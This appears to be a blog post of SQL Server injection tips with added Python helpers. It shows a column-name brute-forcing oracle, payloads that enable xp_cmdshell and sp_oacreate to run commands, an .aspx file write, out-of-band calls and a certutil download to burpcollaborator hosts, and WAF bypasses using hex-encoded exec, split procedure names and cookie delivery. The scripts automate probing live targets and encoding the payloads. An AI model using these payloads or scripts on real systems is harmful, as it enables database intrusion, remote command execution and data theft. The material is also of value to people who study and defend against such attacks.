
Some SQL Server injection tips

Date: 2021-07-01 10:21:17

1. SQL Server is arguably the least compatible of the mainstream databases, and its quirks are exactly what you exploit.

Example: `select x from y where id=1` is the numeric form and `select x from y where id='1'` the string form; both run, because the string is implicitly converted. `select x from y where id="1"`, however, errors and is not allowed: with `SET QUOTED_IDENTIFIER ON` (the default for ODBC, OLE DB and .NET connections) double quotes delimit an identifier, not a string, so the engine looks for a column named `1` and reports `Invalid column name '1'`. If table y has a column `name`, then `select x from y where id="name"` is valid, because `"name"` resolves to that column. (If `name` is a varchar holding non-numeric values the comparison fails at run time with a conversion error, but that is a different message from `Invalid column name`, so the distinction still holds.) This behaviour lets you brute-force a table's column names: a candidate wrapped in double quotes either produces `Invalid column name` or it does not.

In SQL Server, hunting for injection is done with the single quote (`'`); the double-quote cases are rare, but they do exist.

SQL Server does not accept the `1-1=0` style of test when both operands are strings: `'1'-'1'` is rejected, because two strings cannot be subtracted. `'1'-0`, with a numeric operand, goes through implicit type conversion and does not error.

UPDATE: `update x set name='admin' where id=1`. If the `id` position is injectable this is essentially a WHERE-clause injection and is exploited exactly as a SELECT would be. `update x set name="admin" where id=1` errors (double quotes again), and nobody writes it that way. To test injection in the SET value of a SQL Server UPDATE, use string concatenation: if `aaa'+'bbb` is stored as `aaabbb`, it is injectable. Or use a doubled quote, e.g. `aaa''aaa'''` (two single quotes inside a literal are one literal quote).

Injection other than ORDER BY / GROUP BY. Scenario: you send `id` and get id-related data back, you send `name` and get name-related data. That could be an ORDER BY, but what else could it be? `""` is the SQL Server identifier delimiter, not a string, unlike MySQL. The query could be `select "name" from x`, so you can probe with `name","id`, which turns it into `select "name","id" from x`.

Summary: the situations where a double quote is the right test for SQL Server injection are few; leading with `"` is not a wise choice.
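The double-quote behaviour above turned into a small column-name oracle, as an added example that is not from the original post. It assumes a numeric injection point of the shape `WHERE id=<input>`, an application that echoes SQL Server's error text, and a `send` callable standing in for the real HTTP request; the fake server, its schema and its row values are constructed so the script runs offline. It goes one step beyond the text: the Msg 245 conversion error is used both to confirm that a varchar column exists (its message leaks a row value) and to detect a connection running with QUOTED_IDENTIFIER OFF, where `"..."` is a string and the oracle does not apply.

```python
"""Column-name oracle built on SQL Server's double-quote rule (added example)."""
import re
from typing import Callable, Dict, List, Tuple

# Genuine SQL Server error texts: Msg 207 (unknown column) and Msg 245
# (string -> int conversion failure, which names the offending value).
RE_INVALID_COLUMN = re.compile(r"Invalid column name '([^']*)'\.")
RE_CONVERSION = re.compile(
    r"Conversion failed when converting the n?(?:var)?char value '([^']*)' to data type int\.")


def make_probe(candidate: str) -> str:
    """Payload for a numeric injection point, WHERE id=<input>.
    Under SET QUOTED_IDENTIFIER ON (default for ODBC/OLE DB/.NET clients)
    "candidate" is parsed as a column reference, not a string."""
    if '"' in candidate:
        raise ValueError("candidate must not contain a double quote")
    return f'"{candidate}"'


def classify(candidate: str, response: str) -> str:
    """Turn the page returned for one probe into a verdict."""
    if RE_INVALID_COLUMN.search(response):
        return "missing"                      # Msg 207: no such column
    m = RE_CONVERSION.search(response)
    if m:
        # Msg 245 names the value that failed to convert.  If it is our own
        # probe word, the quotes were parsed as a string literal: the
        # connection runs with QUOTED_IDENTIFIER OFF and this oracle does
        # not apply.  Any other value means a varchar column of that name
        # exists, and one of its row values has just been leaked.
        return "quoted_identifier_off" if m.group(1) == candidate else "exists"
    if "Incorrect syntax" in response:
        return "unknown"                      # query is not shaped as assumed
    return "exists"                           # no error: id="col" compiled and ran


def enumerate_columns(send: Callable[[str], str], candidates: List[str]) -> Dict[str, str]:
    """Probe every candidate through `send` (payload -> response body) and
    return {candidate: verdict}.  Stops at the first sign that double quotes
    are strings on this server, since every further probe would be wasted."""
    verdicts: Dict[str, str] = {}
    for cand in candidates:
        verdict = classify(cand, send(make_probe(cand)))
        verdicts[cand] = verdict
        if verdict == "quoted_identifier_off":
            break
    return verdicts


# --- constructed stand-in for the target so the script runs offline ---------
# Column name -> (type, one constructed row value).  Not a real schema.
FAKE_SCHEMA: Dict[str, Tuple[str, str]] = {
    "id": ("int", "1"),
    "name": ("varchar", "admin"),
    "pwd": ("varchar", "s3cret"),
}


def make_fake_send(quoted_identifier: bool = True) -> Callable[[str], str]:
    """Mimic what SELECT x FROM y WHERE id=<payload> answers for "<word>" probes."""
    def fake_send(payload: str) -> str:
        word = re.fullmatch(r'"(.*)"', payload).group(1)
        if not quoted_identifier:
            # "<word>" is a string here, and comparing it with the int id fails.
            return f"Conversion failed when converting the varchar value '{word}' to data type int."
        if word not in FAKE_SCHEMA:
            return f"Msg 207, Level 16, State 1, Line 1\nInvalid column name '{word}'."
        col_type, sample = FAKE_SCHEMA[word]
        if col_type == "int":
            return "<html>1 row</html>"       # id=id holds for every row, page renders
        # int column compared with a varchar column: each row value gets cast.
        return f"Conversion failed when converting the varchar value '{sample}' to data type int."
    return fake_send


if __name__ == "__main__":
    wordlist = ["id", "email", "name", "pwd", "username"]
    for col, verdict in enumerate_columns(make_fake_send(), wordlist).items():
        print(f"{col:10s} {verdict}")
```

Against a real target replace `make_fake_send()` with a function that sends the probe in the vulnerable parameter and returns the response body; the verdict logic stays the same.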

    

    SQL Server injection to command execution, some tips:

    

    Basics:
    Everything below needs sysadmin (sp_configure requires ALTER SETTINGS), and the spawned process runs as the SQL Server service account unless an xp_cmdshell proxy account has been configured.

    1. Enable xp_cmdshell
    EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
    Run a command:
    exec master..xp_cmdshell 'ping dnslog'

    2. Enable sp_oacreate
    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE WITH OVERRIDE;
    EXEC sp_configure 'Ole Automation Procedures', 1;
    RECONFIGURE WITH OVERRIDE;
    Run a command:
    declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt'
    The same thing URL-encoded for a GET parameter (+ is a space, %40 is @, %27 is ', %3a is :):
    ;declare+%40shell+int+exec+sp_oacreate+'wscript.shell',%40shell+output+exec+sp_oamethod+%40shell,'run',null,'c%3a\windows\system32\nslookup.exe%20"http://2ruqida2pbiyia3mnwnsaiadu40vok.burpcollaborator.net"';
    Writing a file with Scripting.FileSystemObject (here an .aspx page; note that @f holds the FileSystemObject and is then overwritten with the TextStream handle returned by CreateTextFile, so the declared @g is never used):
    ;declare+@f+int,@g+int;exec+sp_oacreate+%27Scripting.FileSystemObject%27,@f+output;EXEC+SP_OAMETHOD+@f,%27CreateTextFile%27,@f+OUTPUT,%27d:\Dzts\zt\admin\65.txt%27,1;EXEC+sp_oamethod+@f,%27WriteLine%27,null,%27<%@+Page+Language="C%23"%><%+Response.Write("hello,world");+%>%27--

    3. Calling sp_oamethod
    On bypass:
    exec = execute
    Original statement: execute master..xp_dirtree 'c:'
    Rewritten: execute('master..xp_dirtree "c:" ')
    Rewritten again (out-of-band DNS lookup through a UNC path): execute('master..xp_dirtree "\\im86rc9bogsvyfv87zip9sz34uaky9.burpcollaborator.net"' )


    Bypass for running a command: the procedure name is split and concatenated inside execute(), and the + of the concatenation is sent as %2b because a raw + in a query string decodes to a space:
    ';execute('xp_c'%2b'mdshell " certutil.exe -urlcache -split -f http://cyen6bl8kg2svupmggzc6dk1zs5it7.burpcollaborator.net"');--%20111


    Enabling xp_cmdshell, bypass form (a double-quoted string inside execute() only parses when the connection runs with QUOTED_IDENTIFIER OFF; under the default ON setting it is an identifier and the statement fails):
    execute("sp_configure 'show advanced options', 1");RECONFIGURE;execute("sp_configure 'xp_cmdshell', 1;RECONFIGURE");
    A SQL Server-specific feature:
    select 1e1select user
    This is equivalent to running select 1e1 and then select user: the tokenizer ends the float literal 1e1 at the first character that cannot belong to it, so no whitespace is needed before the next keyword, which defeats WAF rules that expect a space. Used in a payload, bypassing the WAF:
    'select 1e1declare @s varchar (8000) set @s=0x77616974666F722064656C61792027303A303A3227 exec (@s) -- a
    The hex literal decodes to waitfor delay '0:0:2'; assigning a varbinary to a varchar variable converts it implicitly, so the filtered keyword reaches exec() without ever appearing in clear text.
    Case:
    aspx/.net sites accept the same parameter from GET, POST and Cookie
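Encoding these payloads by hand is where mistakes happen, so here is an added example (mine, not the post author's) that generalises the constants on the page: it rebuilds the 0x... literal for any statement and wraps it in the exec(@s) form, emits the sp_oacreate file write with separate handles for the FileSystemObject and the TextStream, and URL-encodes a payload so that the + of string concatenation survives transport. The one assumption is a single-byte server code page for the varchar hex literal; the sample statement and file path are the page's own.

```python
"""Encoding helpers for the bypass payloads in this section (added example)."""
from urllib.parse import unquote_plus


def escape_tsql_string(value: str) -> str:
    """Wrap value as a T-SQL literal; a single quote inside it is doubled."""
    return "'" + value.replace("'", "''") + "'"


def to_hex_literal(tsql: str) -> str:
    """Binary literal that SQL Server assigns to a varchar without a CAST.
    Assumes a single-byte code page; for nvarchar encode UTF-16LE instead."""
    return "0x" + tsql.encode("latin-1").hex().upper()


def from_hex_literal(literal: str) -> str:
    """Inverse of to_hex_literal: what does a captured 0x... payload run?"""
    return bytes.fromhex(literal[2:]).decode("latin-1")


def build_hex_exec(tsql: str) -> str:
    """Hide a statement behind exec(@s): only declare/set/exec stay in clear
    text, the filtered keywords travel inside the hex literal."""
    return f"declare @s varchar(8000) set @s={to_hex_literal(tsql)} exec(@s)"


def build_oa_file_write(path: str, content: str) -> str:
    """sp_oacreate / FileSystemObject file write with two handles: @f is the
    FileSystemObject, @g the TextStream returned by CreateTextFile.  Path and
    content go through escape_tsql_string so embedded quotes survive."""
    return (
        "declare @f int,@g int;"
        "exec sp_oacreate 'Scripting.FileSystemObject',@f output;"
        f"exec sp_oamethod @f,'CreateTextFile',@g output,{escape_tsql_string(path)},1;"
        f"exec sp_oamethod @g,'WriteLine',null,{escape_tsql_string(content)};"
    )


# Characters a query-string decoder or filter would mangle.  Everything else
# is left readable, the way the captured payloads on the page are written.
_ENCODE = {"%": "%25", "+": "%2b", " ": "+", "@": "%40", "#": "%23",
           "&": "%26", "'": "%27"}


def url_encode_payload(payload: str) -> str:
    """GET-parameter form: spaces become '+', and the literal '+' of T-SQL
    string concatenation becomes %2b so the server does not decode it as a
    space."""
    return "".join(_ENCODE.get(ch, ch) for ch in payload)


def url_decode_payload(encoded: str) -> str:
    """What the server sees after standard application/x-www-form-urlencoded decoding."""
    return unquote_plus(encoded)


if __name__ == "__main__":
    stmt = "waitfor delay '0:0:2'"
    print(build_hex_exec(stmt))
    print(build_oa_file_write(r"d:\Dzts\zt\admin\65.txt", "it's a test"))
    print(url_encode_payload("';execute('xp_c'+'mdshell \"whoami\"');-- "))
    # Why %2b matters: a raw + is decoded as a space and the concatenation breaks.
    print(url_decode_payload("'xp_c'+'mdshell'"))
```

Run `from_hex_literal` on any 0x... payload you find in logs before deciding what it did; the literal on this page decodes to a two-second delay, but the same wrapper carries xp_cmdshell just as well.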

  Put the GET parameter into the Cookie instead: ASP.NET's `Request["name"]` looks the parameter up in QueryString, Form, Cookies and ServerVariables in that order, so a parameter the WAF inspects in the query string can be delivered as a cookie of the same name.
